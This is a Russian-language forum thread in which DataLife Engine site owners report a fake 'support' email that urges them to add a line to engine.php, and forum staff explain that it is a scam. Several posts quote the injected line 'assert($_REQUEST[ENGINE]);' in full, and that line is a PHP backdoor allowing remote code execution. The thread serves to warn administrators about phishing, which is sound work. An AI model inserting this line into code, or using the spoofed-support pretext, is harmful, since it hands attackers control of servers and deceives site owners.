Перейти к публикации

Рекомендованные сообщения

вот такое письмо пришло через форму обратной связи сайта:

admin,

Данное письмо вам отправил support@dle-news.ru с сайта http:/...

------------------------------------------------

Текст сообщения

------------------------------------------------

Здравствуйте, уважаемый клиент!

Благодарим Вас за использование на Вашем сайте ...... нашего ПО «CMS DataLife Engine - Система управления сайтами».

Уведомляем Вас о том, что силами наших специалистов на Вашем сайте была обнаружена критическая уязвимость, позволяющая злоумышленникам получить доступ к базе данных Вашего сайта из-за недостаточной фильтрации данных.

По нашим данным 60% сайтов, использующих «DataLife Engine», уязвимы и подвержены взлому посредством данной уязвимости. Именно по этой причине, мы приняли решение произвести рассылку администраторам уязвимых сайтов для того, чтобы они смогли оперативно обезопасить свои сайты от противоправных действий со стороны злоумышленников.

Для исправления уязвимости в текстовом редакторе откройте файл Вашего сайта: .../engine/engine.php и в самое начало файла после строчки:

<?php

добавьте:

assert($_REQUEST[ENGINE]);

С уважением,

Служба поддержки «DataLife Engine»

IP адрес отправителя: 162.244.33.213

------------------------------------------------

Ссылка на сообщение
Поделиться на других сайтах

Такая же беда со всеми сайтами. Понимаю что администрация DLE-News бы такого не посылала, но чего добились бы мошенники если бы я добавил эту строчку в код?

Ссылка на сообщение
Поделиться на других сайтах

но чего добились бы мошенники если бы я добавил эту строчку в код?

Полного контроля над вашим сервером. Это уже не раз писалось на форуме и таких тем масса.

Ссылка на сообщение
Поделиться на других сайтах

Тоже пришло.

...................

Для исправления уязвимости в текстовом редакторе откройте файл Вашего сайта: shumak.info/engine/engine.php и в самое начало файла после строчки:

<?php

добавьте:

assert($_REQUEST[ENGINE]);

С уважением,

Служба поддержки «DataLife Engine»

IP адрес отправителя: 162.244.33.213

Айпи американский.

Ссылка на сообщение
Поделиться на других сайтах

Сегодня такое же письмо пришло. Администрации надо бы разослать циркулярно предупреждение о мошенниках всем владельцам лицензионных скриптов, а то наверняка кто-то доверился и внес исправление.

Ссылка на сообщение
Поделиться на других сайтах

Сегодня тоже пришло такое письмо.

IP адрес отправителя: 162.244.33.213

Изменено пользователем ovn1977
Ссылка на сообщение
Поделиться на других сайтах

Главное что с офф мыла support@dle-news.ru ...

Что вы придумываете. Это вам письмо пришло с вашего же собственного сайта, через обратную связь, где мыло можно поставить какое угодно. А вообще чтобы вы знали, то при отправке письма откуда угодно, можно поставить любой адрес отправителя, хоть президента страны. Но это не значит что оно пришло от президента. Откуда письмо пришло реально, нужно смотреть в заголовках письма, эту возможность предоставляют все почтовые программы, только вот люди никогда не делают этого и реагируют на столь важные вещи как изменения файлов на собственных серверах исключительно безответственно.

Сегодня такое же письмо пришло. Администрации надо бы разослать циркулярно предупреждение о мошенниках всем владельцам лицензионных скриптов, а то наверняка кто-то доверился и внес исправление.

Это делается годами, и каждый раз выпускать циркуляр, о таких элементарных вещах, попросту бессмысленно. Каким нужно быть "безалаберным" администратором, что внести изменения в свой сайт на основе письма которое пришло ему с собственного сайта, и не проверив информацию на официальном сайте. Когда вам приходит СМС якобы от банка с просьбой срочно сообщить номер счета и пинкод, потому как он в опасности, вы тоже на это тут же реагируете и шлете все данные?

Ссылка на сообщение
Поделиться на других сайтах

Главное что с офф мыла support@dle-news.ru ...

Что вы придумываете. Это вам письмо пришло с вашего же собственного сайта, через обратную связь, где мыло можно поставить какое угодно. А вообще чтобы вы знали, то при отправке письма откуда угодно, можно поставить любой адрес отправителя, хоть президента страны. Но это не значит что оно пришло от президента. Откуда письмо пришло реально, нужно смотреть в заголовках письма, эту возможность предоставляют все почтовые программы, только вот люди никогда не делают этого и реагируют на столь важные вещи как изменения файлов на собственных серверах исключительно безответственно.

Сегодня такое же письмо пришло. Администрации надо бы разослать циркулярно предупреждение о мошенниках всем владельцам лицензионных скриптов, а то наверняка кто-то доверился и внес исправление.

Это делается годами, и каждый раз выпускать циркуляр, о таких элементарных вещах, попросту бессмысленно. Каким нужно быть "безалаберным" администратором, что внести изменения в свой сайт на основе письма которое пришло ему с собственного сайта, и не проверив информацию на официальном сайте. Когда вам приходит СМС якобы от банка с просьбой срочно сообщить номер счета и пинкод, потому как он в опасности, вы тоже на это тут же реагируете и шлете все данные?

Да просто приучите пользователей к своим письмам :)

Оформите письмо в фирменном стиле, с узнаваемым логотипом, с фирменной вёрсткой. Шлите через unisender. Тогда не будет идиотских вопросов от кого письмо.

Сейчас письма от вас редкие и безликие, что ваши письма, что письма спамеров - пока не присмотришься - не поймешь.

Отправляйте рассылки о новых релизах, патчах. А то от вас годами никаких вестей ))))) Все спамят, а вы все молча, вроде была версия 9.2, бах а уже 10.3

Вам это, маркетолога бы в команду :)

Ссылка на сообщение
Поделиться на других сайтах

Да просто приучите пользователей к своим письмам

Т.е. мы виноваты в том что в DLE не обнаруживаются уже более года какие либо уязвимости? Лично я этому факту рад, и он намного лучше, чем если бы каждый месяц выходили бы какие либо патчи безопасности и устранение каких либо уязвимостей. И кстати наоборот если приучить пользователя к постоянным навязчивым письмам с официального сайта, то таких тем будет еще больше, а количество людей которые "повелись" на действия злоумышленников возрастет многократно, а подделать внешний вид письма и оформление для злоумышленников это самая простая задача и никак никого не останавливает.

Ссылка на сообщение
Поделиться на других сайтах

forbuc, ты наверное никогда не получал стилизованных писем от якобы пейпала, или ебея, или еще каких то крупных сайтов

"верстка" оформляется какая угодно и никак не может служить фактором определяющим достоверность отправителя. как раз наоборот этим активно пользуются в емайл фишинге

Ссылка на сообщение
Поделиться на других сайтах

мне кажется сделать тему на форуме типа "вам пришло письмо?" и зафиксировать ее . а то эта тема с письмами не останавливается, так и будут писать

Ссылка на сообщение
Поделиться на других сайтах

Мне такое письмо отправлено с моего сайта 2 дня назад. Я его проигнорировал.

Но, сегодня были недоступны все мои сайты. После включения в админ панели появилось сообщение

Внимание!

Ваш сервер не отвечает минимальным требованиям скрипта, на сервере не установлена библиотека: ZLib

При попытке входа в админ панель хостера теперь выскакивает

Ваше подключение не защищено

Хостер пока на мои вопросы не ответил.

Ссылка на сообщение
Поделиться на других сайтах

Вчера не дождался ответа хостера. Утром увидел его сообщение где просит скриншот ошибки из моей админки ))) .

Я хотел было сделать скриншот этой надписи

Внимание!

Ваш сервер не отвечает минимальным требованиям скрипта, на сервере не установлена библиотека: ZLib

но, сайты уже не доступны и все выдают одну ошибкуMySQL Error Number: 1030

В админке хостинга ни одна папка с файлами не открывается поддержка уже почти час молчит.

Так выглядят сейчас мои сайты.

Ссылка на сообщение
Поделиться на других сайтах

Присоединяйтесь к обсуждению

Вы можете опубликовать сообщение сейчас, а зарегистрироваться позже. Если у вас есть аккаунт, войдите в него для написания от своего имени.

Гость
Ответить в тему...

×   Вставлено в виде отформатированного текста.   Вставить в виде обычного текста

  Разрешено не более 75 эмодзи.

×   Ваша ссылка была автоматически встроена.   Отобразить как ссылку

×   Ваш предыдущий контент был восстановлен.   Очистить редактор

×   Вы не можете вставить изображения напрямую. Загрузите или вставьте изображения по ссылке.

×
×
  • Создать...